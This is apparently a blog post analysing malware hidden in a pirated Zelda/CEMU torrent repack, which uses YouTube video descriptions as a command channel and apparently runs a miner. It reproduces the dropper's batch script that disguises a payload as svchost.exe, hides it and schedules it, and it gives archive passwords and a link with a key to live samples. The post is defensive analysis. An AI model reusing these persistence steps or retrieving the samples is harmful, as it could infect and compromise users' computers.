Analyzing Torrent Repack Malware Using YouTube as C&C
Never trust a repack…
The torrent I looked at was: The Legend of Zelda: Breath of the Wild CEMU 1.8.0b [Multi-Lang]
by HZolomon.
TL;DR: It is definitely malware. All the torrent by HZolomon appear to have been infected with malware equal/similar to this one.
[MEGA Folder with relevant files] WARNING: THIS CONTAINS ACTIVE MALWARE (in case you didn’t read the title and like executing random files)… The key is 8NcPVw1TCm_dvZM9s2SU_g
.
Tooling
I used x64dbg, DbgChild, TitanHide, CFF Explorer, Exe2Aut and VirtualBox.
You have to select the checkboxes in the DbgChild plugin to automatically attach x64dbg to any process started by the executable you’re currently debugging:
From here on I’ll just give a brief description of each analysis step.
setup.exe
- With
innoextract
(innounp
has a similar error):
Stream error while parsing setup headers!
├─ detected setup version: 5.4.2
└─ error reason: basic_ios::clear
If you are sure the setup file is not corrupted, consider
filing a bug report at http://innoextract.constexpr.org/issues
Done with 1 error.
-
Extracts
%temp%\is-[A-Z0-9]{5}.tmp\setup.tmp
(is-K35T2.tmp
in MEGA folder) -
Probably this is: http://forum.ru-board.com/topic.cgi?forum=5&topic=34920&start=0&limit=1&m=1#1 and/or http://krinkels.org/resources/categories/innoultra.29/
setup.tmp
Command line (this is similar to what InnoSetup does from what I know):
"C:\Users\Admin\AppData\Local\Temp\is-RPR25.tmp\setup.tmp" /SL5="$230522,1892858,54272,F:\Users\Admin\Documents\Downloads\The Legend of Zelda - Breath of the Wild\setup.exe"
-
Extracts
%temp%\is-[A-Z0-9]{5}.tmp\ISDone.dll
and some other files (includingunarc.dll
). -
Put a DLL breakpoint on
unarc.dll
in x64dbg. -
Start the installation, which causes more stuff to be extracted to
%temp%\is-[A-Z0-9]{5}.tmp
.
All the extracted files are hidden. You can use attrib -S -H
to unhide them (Windows explorer doesn’t allow you to do uncheck the Hidden
box for some readon).
- Break on
FreeArcExtract
(see my earlier blog post for more details). TL;DR it runsunarc.exe
with the function arguments as command line arguments.
Some of the commands used in FreeArcExtract
:
l -- setup-2.bin
x -o+ -pawdawdawd -wF:\BotW\ -dpF:\BotW\ -- setup-2.bin
- Find
cbArcExtract
atISDone.dll:$1A340
from the first parameter ofFreeArcExtract
, break on thepassword?
action check:
Arc password: awdawdawd
The unarc.dll
uses compression algorithm hooks from facompress.dll
(relevant code) + hooks for CLS-compressors (relevant code, CLS-MSC.dll
, CLS-srep.dll
) so make sure to put those next to unarc.exe
if you want to (safely) extract the files.
- After all the files are extracted it runs
DSETUP.exe
, which at first looked fine, but looking a second time the file is not signed by Microsoft and it has no version information or anything.
DSETUP.exe
This is an AutoIt executable (32 bit), it’s basically the first layer of the dropper. With Exe2Aut I extracted the script (slightly deobfuscated by hand):
It tries to identify your anti-virus and based on that drops CLDe2bugLog.txt
in your temp directory with the FileInstall
function. It then replaces the bytes 00000000001C0004
with 377ABCAF271C0004
(7z header) and extracts it with the following command:
CLDe2bugLog.txt e -p"DQMDDMNBQ3824Nnd2nd8812@2*$(#!&NDQB2" CRDebugLog.txt
The contents of CRDebugLog.txt
, but the malware inside does pretty much the same thing. I (unfortunately) looked at the contents of dxdllreg_x86
:
64.exe
SystemCheck.xml
start.bat
start.bat
attrib -h -r -s /S /D %userprofile%\AppData\Roaming\Microsoft\Windows\\svchost.exe
copy /y "64.exe" "%userprofile%\AppData\Roaming\Microsoft\Windows\svchost.exe"
attrib +h +r +s /S /D %userprofile%\AppData\Roaming\Microsoft\Windows\\svchost.exe
schtasks.exe /Create /XML "SystemCheck.xml" /TN "System\SystemCheck"
del 64.exe /f
del SystemCheck.xml /f
del CRDebugLog.txt /f
del CLDebugLog.txt /f
del "%0"
This copies the file to %userprofile%\AppData\Roaming\Microsoft\Windows\svchost.exe
, which made it clear that this is indeed a malicious file. It then goes on to create a scheduled task with SystemCheck.xml
.
SystemCheck.xml
This executes the newly-created svchost.exe
with the -WindowsCheck
command line every X amount of time (probably days, not really worth exploring in this case).
64.exe (svchost.exe)
This file is packed with Enigma x64. TitanHide works fine for debugging Enigma (ScyllaHide has issues). The original entry point (OEP) is at 64.exe:$3059C
. It has stolen bytes, but they are easy to retrieve:
48 83 EC 28 E8 BF B3 00 00 48 83 C4 28 E9 36 FE FF FF
EDIT: I have been asked on reddit to give more details about the “stolen bytes” mentioned here. Before I could answer user izizizizizizi gave a nice explanation:
“Stolen bytes” (is there any non-colloquial name for this I wonder) is a feature of many packers/protectors which prevents easy dumping. During the protection process, a part of the original executable code gets removed and stored in the protector stub. When it’s about to be executed there’s a redirection to the protector’s code instead of the original function. The stub either writes original code in some dynamic buffer and executes it or an obfuscated version of the original function is executed.
To get them I created my own Hello World
-style AutoIt executable and pasted the entry point.
After the ‘unpacking’ enigma, I extracted the SCRIPT
resource and put it in a Hello World
AutoIt executable (32 bit), I then used Exe2Aut.exe
to get the AutoIt script source code (irrelevant parts omitted):
The interesting part is the bot()
function:
It uses a YouTube video (reported, but please report again) as a command and control mechanism. If the description contains one of the _download
, _run
, etc. command it will perform certain actions based on the data in the description (such as downloading a file or updating to a newer version).
It also appears to run some kind of crypto currency miner, although I couldn’t find the SystemCheck
executable:
Well, that has been all for today. It has certainly been fun reversing malware for a change!
“Heb ik dat nou al gezouten?”
blog comments powered by Disqus